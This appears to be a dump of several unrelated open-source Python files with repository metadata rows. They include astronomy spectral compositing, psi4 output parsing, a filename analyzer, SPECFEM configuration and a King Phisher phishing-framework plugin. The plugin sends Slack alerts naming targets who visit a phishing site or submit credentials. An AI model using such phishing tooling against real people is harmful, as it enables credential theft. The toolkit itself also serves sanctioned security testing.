        lum_fluxmedian,lum_fluxmean,lum_oiifluxmedian,lum_oiifluxmean,lum_oiiifluxmedian,lum_oiiifluxmean = \
        new_feiimgii_composite_binoii(bootstrap=bootstrap, nbootstrap=nbootstrap)
    nwave = outwave.size
    # only the medians are saved; the mean columns are kept commented out
    outstr_dtype = [('WAVE', 'f4', outwave.shape),
                    ('EWFLUXMEDIAN', 'f4', ew_fluxmedian.shape),
                    #('EWFLUXMEAN', 'f4', ew_fluxmean.shape),
                    ('EWOII_FLUXMEDIAN', 'f4', ew_oiifluxmedian.shape),
                    #('EWOII_FLUXMEAN', 'f4', ew_oiifluxmean.shape),
                    ('EWOIII_FLUXMEDIAN', 'f4', ew_oiiifluxmedian.shape),
                    #('EWOIII_FLUXMEAN', 'f4', ew_oiiifluxmean.shape),
                    ('LUMFLUXMEDIAN', 'f4', lum_fluxmedian.shape),
                    #('LUMFLUXMEAN', 'f4', lum_fluxmean.shape),
                    ('LUMOII_FLUXMEDIAN', 'f4', lum_oiifluxmedian.shape),
                    #('LUMOII_FLUXMEAN', 'f4', lum_oiifluxmean.shape),
                    ('LUMOIII_FLUXMEDIAN', 'f4', lum_oiiifluxmedian.shape),
                    #('LUMOIII_FLUXMEAN', 'f4', lum_oiiifluxmean.shape),
                    ('OIIEWMIN', 'f4', oiiewmin.shape),
                    ('OIIEWMAX', 'f4', oiiewmax.shape),
                    ('OIIEWBIN', 'f4', oiiewbin.shape),
                    ('OIILUMMIN', 'f4', oiilummin.shape),
                    ('OIILUMMAX', 'f4', oiilummax.shape),
                    ('OIILUMBIN', 'f4', oiilumbin.shape)]
    outstr = np.array([(outwave, ew_fluxmedian, ew_oiifluxmedian, ew_oiiifluxmedian, lum_fluxmedian, lum_oiifluxmedian, lum_oiiifluxmedian,
                        oiiewmin, oiiewmax, oiiewbin, oiilummin, oiilummax, oiilumbin)],
                      dtype=outstr_dtype)
    print("Write into file: {0}.".format(outfile))
    fits = fitsio.FITS(outfile, 'rw', clobber=overwrite)
    fits.write(outstr)
    fits.close()
#def make_model(lines):
# """Make a model for a normalized spectrum
# In logarithmic space
# """
#
# dloglam = 1E-4 # or 69./3E5/np.log(10.)
# left_bound = 10.*dloglam # pixels
# right_bound = 5.*dloglam # pixels
# width = 200./3E5/np.log(10.) # Delta_v/c in unit of log_10(lambda), 200 km/s
# min_width = 50./3E5/np.log(10.) #
# max_width = 2000./3E5/np.log(10.) #
# namp = 10 # maximum amplitude
#
# full_model = {}
#
# # Underlying quadratic model
# tmp_prefix = 'Quadratic_'
# full_model[0] = lmfit.models.QuadraticModel(prefix=tmp_prefix)
#
# pars = full_model[0].make_params()
# pars[tmp_prefix+'a'].set(0., min=-0.1, max=0.1)
# pars[tmp_prefix+'b'].set(0., min=-0.5, max=0.5)
# pars[tmp_prefix+'c'].set(1., min=0.9, max=1.1)
#
# # Line Gaussian model
# # Line: 'ELEMENT', 'WAVE', 'EW', 'SIGN'
# nlines = lines.size
# if nlines==0: return (full_model[0], pars)
#
# for (iline, this_line) in zip(np.arange(nlines)+len(full_model), lines):
# tmp_prefix = this_line['ELEMENT']+'_'+'{0:02d}'.format(iline)+'_'
# full_model[iline] = lmfit.models.GaussianModel(prefix=tmp_prefix)
#
# pars.update(full_model[iline].make_params())
# tmp_wave = this_line['WAVE']-1.
# tmp_loglam = np.log10(this_line['WAVE']-1.)
#
# tmp_left = np.log10(this_line['WAVE']-left_bound)
# tmp_right = np.log10(this_line['WAVE']-right_bound)
# pars[tmp_prefix+'center'].set(tmp_loglam, min=tmp_left, max=tmp_right)
# pars[tmp_prefix+'sigma'].set(width, min=min_width, max=max_width)
#
# tmp_sign = this_line['SIGN']
# tmp_amp = tmp_sign*this_line['EW']/tmp_wave/np.log(10.)
# if tmp_sign>0:
# pars[tmp_prefix+'amplitude'].set(tmp_amp, min=0, max=tmp_amp*namp)
# else:
# pars[tmp_prefix+'amplitude'].set(tmp_amp, min=tmp_amp*namp, max=0)
#
# model = full_model[0]
# for imod in np.arange(len(full_model)-1)+1:
# model = model+full_model[imod]
#
# return (model, pars)
#
#
# All stuff below must be obsolete
# The new one is new_feiimgii_composite
#def feiimgii_composite(zmin=0.6, zmax=1.2):
# Read in
# objs_ori = elg_readin()
# (master_wave, rest_allflux, rest_allivar) = rest_allspec_readin()
# master_loglam = np.log10(master_wave)
#
# wave_pos = np.array([2200., 4050.])
# #zmin = _minmaxwave[0]/wave_pos[0]-1.
# #zmax = _minmaxwave[1]/wave_pos[1]-1.
# # zmin<z<zmax; zGOOD==1; CLASS='GALAXY'
# zindex = (np.where(np.logical_and(np.logical_and(np.logical_and(
# objs_ori['zGOOD']==1, objs_ori['Z']>zmin), objs_ori['Z']<zmax), objs_ori['CLASS']=='GALAXY')))[0]
#
# rest_loc = np.searchsorted(master_wave, wave_pos)
# outwave = master_wave[rest_loc[0]:rest_loc[1]]
# outloglam = np.log10(outwave)
#
# tmpflux = rest_allflux[rest_loc[0]:rest_loc[1],zindex]
# tmpivar = rest_allivar[rest_loc[0]:rest_loc[1],zindex]
# fluxmean = np.zeros((tmpflux.shape)[0])
# #fluxmean = np.average(tmpflux, axis=1, weights=tmpivar.astype(bool))
# fluxmedian = np.zeros((tmpflux.shape)[0])
# fluxflag = np.ones(fluxmedian.size)
# for i in np.arange((tmpflux.shape)[0]):
# iuse = (np.where(tmpivar[i,:]>0))[0]
# fluxmedian[i] = np.median(tmpflux[i,iuse])
# fluxmean[i] = np.mean(tmpflux[i,iuse])
#
# # Mask out useless wavelength ranges
# # left 2300
# wave_pos = np.array([2200.])
# rest_loc = np.searchsorted(outwave, wave_pos)
# fluxflag[0:rest_loc[0]] = 0
# # Fe II 2350
# wave_pos = np.array([2330., 2420])
# rest_loc = np.searchsorted(outwave, wave_pos)
# fluxflag[rest_loc[0]:rest_loc[1]] = 0.
# # Fe II 2600
# wave_pos = np.array([2570., 2640])
# rest_loc = np.searchsorted(outwave, wave_pos)
# fluxflag[rest_loc[0]:rest_loc[1]] = 0.
# # Mg II 2800
# wave_pos = np.array([2770., 2820])
# rest_loc = np.searchsorted(outwave, wave_pos)
# fluxflag[rest_loc[0]:rest_loc[1]] = 0.
# # Mg I 2853
# wave_pos = np.array([2843., 2863])
# rest_loc = np.searchsorted(outwave, wave_pos)
# fluxflag[rest_loc[0]:rest_loc[1]] = 0.
# # right 2900
# wave_pos = np.array([2900.])
# rest_loc = np.searchsorted(outwave, wave_pos)
# fluxflag[rest_loc[0]:] = 0.
#
# imask = (np.where(fluxflag>0.))[0]
# if imask.size>10:
# x = outloglam[imask]
# # Mean
# y = fluxmean[imask]
# z = np.polyfit(x, y, 3)
# p = np.poly1d(z)
# continuum = p(outloglam)
# norm_fluxmean = fluxmean/continuum
# # Median
# y = fluxmedian[imask]
# z = np.polyfit(x, y, 3)
# p = np.poly1d(z)
# continuum = p(outloglam)
# norm_fluxmedian = fluxmedian/continuum
#
# return (outwave, fluxmean, fluxmedian, norm_fluxmean, norm_fluxmedian)
#
#def make_model(lines):
# """Make a model for a normalized spectrum
# In logarithmic space
# """
#
# dloglam = 1E-4 # or 69./3E5/np.log(10.)
# left_bound = 10.*dloglam # pixels
# right_bound = 5.*dloglam # pixels
# width = 200./3E5/np.log(10.) # Delta_v/c in unit of log_10(lambda), 200 km/s
# min_width = 50./3E5/np.log(10.) #
# max_width = 2000./3E5/np.log(10.) #
# namp = 10 # maximum amplitude
#
# full_model = {}
#
# # Underlying quadratic model
# tmp_prefix = 'Quadratic_'
# full_model[0] = lmfit.models.QuadraticModel(prefix=tmp_prefix)
#
# pars = full_model[0].make_params()
# pars[tmp_prefix+'a'].set(0., min=-0.1, max=0.1)
# pars[tmp_prefix+'b'].set(0., min=-0.5, max=0.5)
# pars[tmp_prefix+'c'].set(1., min=0.9, max=1.1)
#
# # Line Gaussian model
# # Line: 'ELEMENT', 'WAVE', 'EW', 'SIGN'
# nlines = lines.size
# if nlines==0: return (full_model[0], pars)
#
# for (iline, this_line) in zip(np.arange(nlines)+len(full_model), lines):
# tmp_prefix = this_line['ELEMENT']+'_'+'{0:02d}'.format(iline)+'_'
# full_model[iline] = lmfit.models.GaussianModel(prefix=tmp_prefix)
#
# pars.update(full_model[iline].make_params())
# tmp_wave = this_line['WAVE']-1.
# tmp_loglam = np.log10(this_line['WAVE']-1.)
#
# tmp_left = np.log10(this_line['WAVE']-left_bound)
# tmp_right = np.log10(this_line['WAVE']-right_bound)
# pars[tmp_prefix+'center'].set(tmp_loglam, min=tmp_left, max=tmp_right)
# pars[tmp_prefix+'sigma'].set(width, min=min_width, max=max_width)
#
# tmp_sign = this_line['SIGN']
# tmp_amp = tmp_sign*this_line['EW']/tmp_wave/np.log(10.)
# if tmp_sign>0:
# pars[tmp_prefix+'amplitude'].set(tmp_amp, min=0, max=tmp_amp*namp)
# else:
# pars[tmp_prefix+'amplitude'].set(tmp_amp, min=tmp_amp*namp, max=0)
#
# model = full_model[0]
# for imod in np.arange(len(full_model)-1)+1:
# model = model+full_model[imod]
#
# return (model, pars)
#
#def line_property(loglam, flux, lines, npixels=15):
# """Measure line properties in a normalized spectrum in the rest frame:
# Total equivalent width: REW
# Velocity profile: REW(velocity)/REW(total)
# """
#
# nlines = lines.size
# ew_profile = np.zeros(nlines, dtype=[('WAVE', '({0},)f4'.format(npixels)), ('VEL', '({0},)f4'.format(npixels)), ('EW', '({0},)f4'.format(npixels))])
# for (iline, this_line) in zip(np.arange(nlines), lines):
# tmp_loglam0 = np.log10(this_line['WAVE'])
# tmp_left = np.log10(this_line['WAVELEFT'])
# rest_loc = np.searchsorted(loglam, tmp_left)
# #print(rest_loc)
# #print(np.cumsum(flux[rest_loc:(rest_loc+npixels)]))
# ew_profile[iline]['EW'][:] = np.cumsum(flux[rest_loc:(rest_loc+npixels)])
# #print(ew_profile[iline]['EW'])
# ew_profile[iline]['VEL'][:] = (loglam[rest_loc:(rest_loc+npixels)]-tmp_loglam0)*np.log(10.)*3E5
# ew_profile[iline]['WAVE'][:] = np.power(10, loglam[rest_loc:(rest_loc+npixels)])
#
# return ew_profile
#
#def speclines(region='2800'):
# if region == '2800':
# nlines = 2
# lines = zeros(nlines, dtype=[('SIGN', 'i'),('ELEMENT','S20'),('WAVE','f4'),('EW','f4'), ('WAVELEFT', 'f4')])
# lines[0] = (-1, 'MgII', 2796.35, 2., 2789.)
# lines[1] = (-1, 'MgII', 2803.53, 2., 2798.)
| guangtunbenzhu/BGT-Cosmology | Spectroscopy/archetype/ebossspec.py | Python | mit | 37,112 | [
"Galaxy",
"Gaussian"
] | c06f461f85e722e5b75aa3c91b47e3261b3781d9af717678a557484b7a7eab3e |
import json
import king_phisher.plugins as plugin_opts
import king_phisher.server.database.manager as db_manager
import king_phisher.server.database.models as db_models
import king_phisher.server.plugins as plugins
import king_phisher.server.signals as signals
import king_phisher.utilities as utilities
try:
import requests
except ImportError:
has_requests = False
else:
has_requests = True
EXAMPLE_CONFIG = """\
# Documentation on obtaining a slack webhook url can be found here https://api.slack.com/messaging/webhooks.
webhookurl: https://hooks.slack.com/services/....
channel: <slack channel name>
"""
class Plugin(plugins.ServerPlugin):
	"""Server plugin that forwards campaign events to a Slack channel via an
	incoming webhook: one notice per new visit and per submitted credential.
	"""
	authors = ['Sebastian Reitenbach']
	classifiers = ['Plugin :: Server :: Notifications']
	title = 'Slack Notifications'
	description = """
	A plugin that uses Slack Webhooks to send notifications
	on new website visits and submitted credentials to a slack channel.
	Notifications about credentials are sent with @here.
	"""
	homepage = 'https://github.com/securestate/king-phisher-plugins'
	options = [
		plugin_opts.OptionString(
			name='webhookurl',
			description='The slack webhook URL to use'
		),
		plugin_opts.OptionString(
			name='channel',
			# fixed typo: "were" -> "where"
			description='the channel where notifications are supposed to go to'
		)
	]
	req_min_version = '1.4.0'
	req_packages = {
		'requests': has_requests
	}
	version = '0.1'

	def initialize(self):
		"""Register for the server-initialized signal; always succeeds."""
		signals.server_initialized.connect(self.on_server_initialized)
		return True

	def on_server_initialized(self, server):
		"""Hook database inserts for visits/credentials and announce activation."""
		signals.db_session_inserted.connect(self.on_kp_db_event, sender='visits')
		signals.db_session_inserted.connect(self.on_kp_db_event, sender='credentials')
		self.send_notification('King-Phisher Slack notifications are now active')

	def on_kp_db_event(self, sender, targets, session):
		"""Send one notification per inserted row.

		*sender* is the table name ('visits' or 'credentials'); any other
		sender is ignored. *targets* are the newly inserted rows.
		"""
		for event in targets:
			# Look up the originating message row for target email / campaign.
			# (Renamed from 'message' to avoid shadowing the notification text.)
			kp_message = db_manager.get_row_by_id(session, db_models.Message, event.message_id)
			if sender == 'visits':
				text = "New visit from {0} for campaign '{1}'".format(kp_message.target_email, kp_message.campaign.name)
			elif sender == 'credentials':
				text = "<!here> New credentials received from {0} for campaign '{1}'".format(kp_message.target_email, kp_message.campaign.name)
			else:
				return
			self.send_notification(text)

	def send_notification(self, message):
		"""POST *message* to the configured Slack webhook URL and channel.

		NOTE(review): the HTTP response is intentionally not checked, so
		delivery failures are silent; consider logging non-2xx responses.
		"""
		slack_data = {'text': message, 'channel': self.config['channel']}
		requests.post(
			self.config['webhookurl'], data=json.dumps(slack_data),
			headers={'Content-Type': 'application/json'}
		)
| securestate/king-phisher-plugins | server/slack_notifications.py | Python | bsd-3-clause | 2,604 | [
"VisIt"
] | 0438be731b71bd71b4dd29fac7a5230986830acdcce1988c5ec93e7cb99495a7 |
"""The modules in this subpackage provide visualization of 3D objects
using different backends (VRML, VMD, VPython), but with an almost
identical interface. It is thus possible to write generic 3D graphics
code in which the backend can be changed by modifying a single line
of code.
The intended application of these modules is scientific visualization.
Many sophisticated 3D objects are therefore absent, as are complex
surface definitions such as textures.
"""
| OS2World/DEV-PYTHON-UTIL-ScientificPython | src/Lib/site-packages/Scientific/Visualization/__init__.py | Python | isc | 465 | [
"VMD"
] | c094d83d617cfeff8d0be8c4cedd9abb962483216cdc76b69a52538ef744fa22 |
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2017 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""
Module of helper functions for distributed ccresponse computations.
Defines functions for retrieving data computed at displaced geometries.
"""
from __future__ import absolute_import
from __future__ import print_function
import collections
import shelve
import copy
import os
from psi4.driver import p4util
from psi4.driver.constants import *
def collect_displaced_matrix_data(db, signature, row_dim):
    """Gather one flattened tensor per displaced-geometry job.

    db: (database) shelve object for this property calculation;
        ``db['job_status']`` lists the displacement sub-directories.
    signature: (string) marker that tells the matrix reader where the
        targeted tensor data begins in each output file.
    row_dim: expected number of rows the tensor spans in the file.

    Returns a 2d list ``result[i][j]`` where ``i`` indexes displacements and
    ``j`` indexes elements of the flattened tensor at that displacement.
    Throws: none
    """
    matrices = []
    for job_dir in db['job_status']:
        output_path = '{}/output.dat'.format(job_dir)
        with open(output_path) as handle:
            matrices.append(parse_geometry_matrix_data(handle, signature, row_dim))
    return matrices
# END collect_displaced_matrix_data()
def parse_geometry_matrix_data(outfile, matrix_name, row_tot):
    """
    Parses data from a 3 by n matrix printed to a file.

    outfile: ( file ) handle open in read mode (any iterable of lines)
    matrix_name: ( string ) marker indicating the matrix data is found on the
        lines below it
    row_tot: ( int ) number of lines the matrix data spans in the file

    Returns: matrix_data, a list of matrix elements, len = 3*row_tot
    Throws: p4util.ParsingError (Collecting matrix data failed) if
        it can't find matrix_name in the file,
        it found matrix_name but too many unreadable lines follow it, or
        it found matrix_name and data but the number of elements is incorrect.
    """
    collect_matrix = False
    n_rows = 0
    n_tries = 0
    matrix_data = []
    for line in outfile:
        if matrix_name in line:
            collect_matrix = True
        if collect_matrix and (n_rows < row_tot):
            n_tries += 1
            # Give up rather than scanning an arbitrarily long file.
            # NOTE: this guard was previously raised *inside* the try block
            # with an unqualified ParsingError, so the bare except swallowed
            # the (NameError) exception and the guard could never fire.
            if n_tries > (row_tot + 13):
                raise p4util.ParsingError(
                    '{} Matrix was unreadable. Scanned {} lines.'.format(
                        matrix_name, n_tries))
            try:
                (index, x, y, z) = line.split()
                matrix_data.append(float(x))
                matrix_data.append(float(y))
                matrix_data.append(float(z))
                n_rows += 1
            except ValueError:
                # Header, blank, or otherwise non-data lines between the
                # marker and the matrix rows are expected; skip them.
                pass
    if (n_rows == row_tot) and (len(matrix_data) != 3 * row_tot):
        raise p4util.ParsingError('Collecting {} data failed!'
                                  '\nExpected {} elements but only captured {}'.format(
                                      matrix_name, 3 * row_tot, len(matrix_data)))
    if len(matrix_data) == 3 * row_tot:
        return matrix_data
    raise p4util.ParsingError('data for {} was not found in the output file, '
                              'but it was marked for collection. Check output files '
                              'in displacement sub-dirs!'.format(matrix_name))
# END parse_geometry_matrix_data()
| kratman/psi4public | psi4/driver/procrouting/findif_response_utils/data_collection_helper.py | Python | gpl-2.0 | 4,299 | [
"Psi4"
] | e86a9d350f77c28000e3fae65006cd2eb74d70d575d201debab360b21dc8f948 |
# -*- coding: utf-8 -*-
# Copyright(c) 2016-2020 Jonas Sjöberg <autonameow@jonasjberg.com>
# Source repository: https://github.com/jonasjberg/autonameow
#
# This file is part of autonameow.
#
# autonameow is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation.
#
# autonameow is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with autonameow. If not, see <http://www.gnu.org/licenses/>.
from analyzers import BaseAnalyzer
from core.truths import known_data_loader
from core.metadata.normalize import cleanup_full_title
from util.text import collapse_whitespace
from util.text import regexbatch
from util.text import remove_blacklisted_lines
from util.text import TextChunker
from util.text.filter import RegexLineFilter
from util.text.patternmatching import find_publisher_in_copyright_notice
# TODO: [TD0094] Search text for DOIs and query external services
# Example DOI: `10.1109/TPDS.2010.125`. Could be used to query external
# services for publication metadata, as with ISBN-numbers.
BLACKLISTED_TEXTLINES = frozenset([
'Advanced PDF Repair at http://www.datanumen.com/apdfr/',
'Brought to you by:',
'freepdf-books.com',
'Get More Refcardz! Visit refcardz.com',
'http://freepdf-books.com',
'www.itbookshub.com',
'Preface:',
'Table of Contents',
'This page intentionally left blank',
'Unknown',
'www.freepdf-books.com',
'www.allitebooks.com',
'www.it-ebooks.info',
'free ebooks wwwebook777com',
'free ebooks www.ebook777.com',
'free ebooks ==> www.ebook777.com',
'Free ebooks ==> www.ebook777.com',
])
title_filter = RegexLineFilter([
r'^\w$',
r'^[\.=-]+$',
r'.*cncmanual\.com.*',
r'matter material after the index\.? Please use the Bookmarks',
r'and Contents at a Glance links to access them\.?',
r'Contents at a Glance',
r'about the author.*',
r'about the technical reviewer.*',
r'acknowledgments.*',
r'for your convenience .* has placed some of the front',
r'.*freepdf-books\.com.*',
r'introduction.*',
r'index.?[0-9]+',
r'.*chapter ?[0-9]+.*',
r'.*www\.?ebook777\.?com.*',
], ignore_case=True)
class DocumentAnalyzer(BaseAnalyzer):
    """Extracts candidate 'title', 'datetime' and 'publisher' metadata from a
    file's textual content (PDFs and text files)."""
    RUN_QUEUE_PRIORITY = 0.5
    HANDLES_MIME_TYPES = ['application/pdf', 'text/*']
    FIELD_LOOKUP = {
        'title': {
            'coercer': 'aw_string',
            'multivalued': 'false',
            'mapped_fields': [
                # TODO: [TD0166] Set weights dynamically
                {'WeightedMapping': {'field': 'Title', 'weight': '0.1'}},
            ],
            'generic_field': 'title'
        },
        'datetime': {
            'coercer': 'aw_timedate',
            'multivalued': 'false',
            'mapped_fields': [
                {'WeightedMapping': {'field': 'DateTime', 'weight': '0.25'}},
                {'WeightedMapping': {'field': 'Date', 'weight': '0.25'}},
            ],
            'generic_field': 'date_created',
        },
        'publisher': {
            'coercer': 'aw_string',
            'multivalued': 'false',
            'mapped_fields': [
                {'WeightedMapping': {'field': 'Publisher', 'weight': '1'}},
            ],
            'generic_field': 'publisher',
        }
    }

    def __init__(self, fileobject, config, request_data_callback):
        super().__init__(fileobject, config, request_data_callback)

    def analyze(self):
        """Run the analysis and record any title/publisher results found."""
        maybe_text = self.request_any_textual_content()
        if not maybe_text:
            return

        filtered_text = remove_blacklisted_lines(maybe_text, BLACKLISTED_TEXTLINES)
        normalized_whitespace_text = collapse_whitespace(filtered_text)

        # Only the leading chunk (~2% of the text) is searched; titles and
        # copyright/publisher information are expected near the start.
        text_chunks = TextChunker(
            text=normalized_whitespace_text,
            chunk_to_text_ratio=0.02
        )
        leading_text = text_chunks.leading

        # TODO: Search text for datetime information.
        # TODO: [incomplete] Search more than 1 line! Handle multiple matches.
        text_titles = [
            t for t, _ in find_titles_in_text(leading_text, num_lines_to_search=1)
        ]
        if text_titles:
            # TODO: [TD0190] Bundle single fields like this into "records" so
            # that candidate values can be compared against values from other
            # sources and ranked using relationships between fields within and
            # between records.
            maybe_text_title = text_titles[0]
            clean_title = cleanup_full_title(maybe_text_title)
            if clean_title:
                self._add_intermediate_results('title', clean_title)

        # Known-publisher lookups: prefer literal string patterns and fall
        # back to regex patterns only when no literal patterns are defined.
        patterns = known_data_loader.literal_lookup_dict('publisher')
        if not patterns:
            patterns = known_data_loader.regex_lookup_dict('publisher')
        if patterns:
            # TODO: Pass multiple possible publishers with probabilities.
            # (publisher is not "multivalued")
            publisher = self._search_text_for_publisher(leading_text, patterns)
            if publisher:
                self._add_intermediate_results('publisher', publisher)

    def _search_text_for_publisher(self, text, patterns):
        # Prefer a publisher extracted from a copyright notice; otherwise
        # fall back to a plain candidate search over the whole text.
        # (Replaces two previously duplicated branches in analyze().)
        result = self._search_text_for_copyright_publisher(text, patterns)
        if result:
            return result
        return self._search_text_for_candidate_publisher(text, patterns)

    def _search_text_for_candidate_publisher(self, text, patterns):
        # TODO: [TD0130] Implement general-purpose substring matching/extraction.
        return find_publisher(text, patterns)

    def _search_text_for_copyright_publisher(self, text, patterns):
        # TODO: [TD0130] Implement general-purpose substring matching/extraction.
        possible_publishers = find_publisher_in_copyright_notice(text)
        if not possible_publishers:
            return None

        # TODO: [cleanup] ..
        return find_publisher(possible_publishers, patterns)

    @classmethod
    def dependencies_satisfied(cls):
        # No external dependencies beyond what the application already needs.
        return True
def find_titles_in_text(text, num_lines_to_search):
    """Collect candidate title lines from the start of *text*.

    Scans from the first line until ``num_lines_to_search`` candidates have
    been gathered, skipping blank lines and lines rejected by the
    module-level ``title_filter``. Each candidate is paired with a score:
    the first candidate scores 1.0 and scores decrease linearly down to
    ``1/num_lines_to_search`` for the last one.

    Returns a list of ``(line, score)`` tuples.
    """
    assert isinstance(num_lines_to_search, int) and num_lines_to_search > 0

    candidates = []
    for raw_line in text.splitlines():
        if len(candidates) == num_lines_to_search:
            break
        if not raw_line.strip():
            continue
        kept_line = title_filter(raw_line)
        if not kept_line:
            continue
        # TODO: Set weight dynamically ..
        score = (num_lines_to_search - len(candidates)) / num_lines_to_search
        candidates.append((kept_line, score))
    return candidates
def find_publisher(text, candidates):
    """Return the replacement value for the first candidate pattern that
    matches *text*, or None when nothing matches."""
    match = regexbatch.find_replacement_value(candidates, text)
    return match if match else None
| jonasjberg/autonameow | autonameow/analyzers/analyze_document.py | Python | gpl-2.0 | 8,535 | [
"VisIt"
] | ef28f7cca77705d93e5c60fd3914cb41d454b5a565b7a383aaba665d92ec29ee |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Input file writer for SPECFEM3D_CARTESIAN with support for the CEM project.
:copyright:
Lion Krischer (krischer@geophysik.uni-muenchen.de), 2013
Emanuele Casarotti (emanuele.casarotti@ingv.it), 2013
:license:
GNU General Public License, Version 3
(http://www.gnu.org/copyleft/gpl.html)
"""
import inspect
import math
import numpy as np
import os
# Define the required configuration items. The key is always the name of the
# configuration item and the value is a tuple. The first item in the tuple is
# the function or type that it will be converted to and the second is the
# documentation.
REQUIRED_CONFIGURATION = {
"RECORD_LENGTH_IN_MINUTES": (float, "record length in minutes"),
"SIMULATION_TYPE": (
int, "forward or adjoint simulation, 1 = forward, "
"2 = adjoint, 3 = both simultaneously"),
"NCHUNKS": (int, "number of chunks (1, 2, 3, or 6)"),
# number of elements at the surface along the two sides of the first chunk
# (must be multiple of 16 and 8 * multiple of NPROC below)
"NEX_XI": (int, "number of elements at the surface along the xi side "
"of the first chunk (must be multiple of 16 and 8 * "
"multiple of NPROC_XI)."),
"NEX_ETA": (int, "number of elements at the surface along the eta side "
"of the first chunk (must be multiple of 16 and 8 * "
"multiple of NPROC_ETA)."),
# number of MPI processors along the two sides of the first chunk
"NPROC_XI": (int, "number of MPI processors along the xi side of the "
"first chunk."),
"NPROC_ETA": (int, "number of MPI processors along the eta side of the "
"first chunk."),
"MODEL": (str, "The used model. See the manual for a number of choices. "
"Use 'CEM_ACCEPT' to load a model from the CEM mesher, and "
"'CEM_REQUEST' to generate a CEM request.")
}
# The default configuration item. Contains everything that can sensibly be set
# to some default value. The syntax is very similar to the
# REQUIRED_CONFIGURATION except that the tuple now has three items, the first
# one being the actual default value.
DEFAULT_CONFIGURATION = {
"NOISE_TOMOGRAPHY":
(0, int, "flag of noise tomography, three steps (1,2,3). If "
"earthquake simulation, set it to 0."),
"SAVE_FORWARD": (False, bool, "save last frame of forward simulation or "
"not"),
"ANGULAR_WIDTH_XI_IN_DEGREES": (90.0, float, "Width of one side of the "
"chunk"),
"ANGULAR_WIDTH_ETA_IN_DEGREES": (90.0, float,
"Width of the other side of the chunk"),
"CENTER_LATITUDE_IN_DEGREES": (40.0, float, "Laitude center of chunk"),
"CENTER_LONGITUDE_IN_DEGREES": (10.0, float, "Longitude center of chunk"),
"GAMMA_ROTATION_AZIMUTH": (
20.0, float, "Defines the rotation angle of the chunk about its "
"center measured counter clockwise from due North "
"(degrees)."),
"OCEANS": (False, bool, "parameter describing the earth model."),
"ELLIPTICITY": (False, bool, "parameter describing the earth model."),
"TOPOGRAPHY": (False, bool, "parameter describing the earth model."),
"GRAVITY": (False, bool, "parameter describing the earth model."),
"ROTATION": (False, bool, "parameter describing the earth model."),
"ATTENUATION": (False, bool, "parameter describing the earth model."),
"ABSORBING_CONDITIONS": (False, bool, "absorbing boundary conditions for "
"a regional simulation"),
# to undo attenuation for sensitivity kernel calculations or forward
# runs with SAVE_FORWARD
# use one (and only one) of the two flags below. UNDO_ATTENUATION is
# much better (it is exact)
# but requires a significant amount of disk space for temporary storage.
"ATTENUATION_1D_WITH_3D_STORAGE": (True, bool, ""),
"PARTIAL_PHYS_DISPERSION_ONLY": (True, bool, ""),
"UNDO_ATTENUATION": (False, bool, ""),
"NT_DUMP_ATTENUATION": (100, int,
"how often we dump restart files to undo "
"attenuation, only needed when using "
"UNDO_ATTENUATION"),
"EXACT_MASS_MATRIX_FOR_ROTATION":
(False, bool,
"three mass matrices instead of one are needed to handle rotation "
"very accurately; otherwise rotation is handled slightly less "
"accurately (but still reasonably well); set to .true. if you are "
"interested in precise effects related to rotation; set to .false. "
"if you are solving very large inverse problems at high frequency "
"and also undoing attenuation exactly using the UNDO_ATTENUATION "
"flag above, in which case saving as much memory as possible can be "
"a good idea. You can also safely set it to .false. if you are not "
"in a period range in which rotation matters, e.g. if you are "
"targetting very short-period body waves. if in doubt, set to "
".true. Set it to .true. if you have ABSORBING_CONDITIONS above, "
"because in that case the code will use the three mass matrices "
"anyway and thus there is no additional cost. this flag is of "
"course unused if ROTATION above is set to .false."),
"USE_LDDRK": (False, bool, "this for LDDRK high-order time scheme instead "
"of Newmark"),
"INCREASE_CFL_FOR_LDDRK":
(True, bool,
"the maximum CFL of LDDRK is significantly higher than that of the "
"Newmark scheme, in a ratio that is theoretically 1.327 / 0.697 = "
"1.15 / 0.604 = 1.903 for a solid with Poisson's ratio = 0.25 and "
"for a fluid (see the manual of the 2D code, SPECFEM2D, Tables 4.1 "
"and 4.2, and that ratio does not depend on whether we are in 2D or "
"in 3D). However in practice a ratio of about 1.5 to 1.7 is often "
"safer (for instance for models with a large range of Poisson's "
"ratio values). Since the code computes the time step using the "
"Newmark scheme, for LDDRK we will simply multiply that time step "
"by this ratio when LDDRK is on and when flag "
"INCREASE_CFL_FOR_LDDRK is true."),
"RATIO_BY_WHICH_TO_INCREASE_IT": (1.5, float, ""),
"MOVIE_SURFACE": (False, bool, ""),
"MOVIE_VOLUME": (False, bool, ""),
"MOVIE_COARSE": (False, bool, "Saves movie only at corners of elements."),
"NTSTEP_BETWEEN_FRAMES": (100, int, ""),
"HDUR_MOVIE": (0.0, float, 0.0),
# save movie in volume. Will save element if center of element is in
# prescribed volume
# top/bottom: depth in KM, use MOVIE_TOP = -100 to make sure the surface
# is stored.
# west/east: longitude, degrees East [-180/180] top/bottom: latitute,
# degrees North [-90/90]
# start/stop: frames will be stored at MOVIE_START +
# i*NSTEP_BETWEEN_FRAMES, where i=(0,1,2..) and iNSTEP_BETWEEN_FRAMES <=
# MOVIE_STOP
# movie_volume_type: 1=strain, 2=time integral of strain, 3=\mu*time
# integral of strain
# type 4 saves the trace and deviatoric stress in the whole volume,
# 5=displacement, 6=velocity
"MOVIE_VOLUME_TYPE": (2, int, ""),
"MOVIE_TOP_KM": (-100.0, float, ""),
"MOVIE_BOTTOM_KM": (1000.0, float, ""),
